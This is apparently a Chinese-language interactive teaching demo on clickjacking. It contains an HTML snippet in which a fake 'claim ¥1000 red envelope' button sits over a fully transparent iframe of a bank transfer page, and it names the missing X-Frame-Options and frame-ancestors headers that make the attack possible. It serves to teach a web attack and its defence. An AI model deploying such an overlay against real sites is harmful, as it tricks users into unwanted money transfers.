调整透明度滑块,观察攻击者如何隐藏真实的银行页面
用户看到的是下面的"领取红包"页面,但实际点击的是透明 iframe 中的银行转账按钮
点击下方按钮立即领取 ¥1000
当 iframe 完全透明时,用户只能看到诱饵页面
当前余额: 加载中...
被劫持转账次数: 0
<!-- 攻击者页面 -->
<div style="position: relative;">
<!-- 诱饵层 -->
<div class="decoy">
<h2>🎁 领取红包</h2>
<button>立即领取</button>
</div>
<!-- 透明 iframe 覆盖 -->
<iframe
src="https://bank.com/transfer"
style="
position: absolute;
top: 0;
left: 0;
width: 100%;
height: 100%;
opacity: 0; /* 完全透明 */
">
</iframe>
</div>
目标页面 没有设置 以下防护头:
X-Frame-Options: DENYContent-Security-Policy: frame-ancestors 'none'因此可以被任意页面通过 iframe 嵌入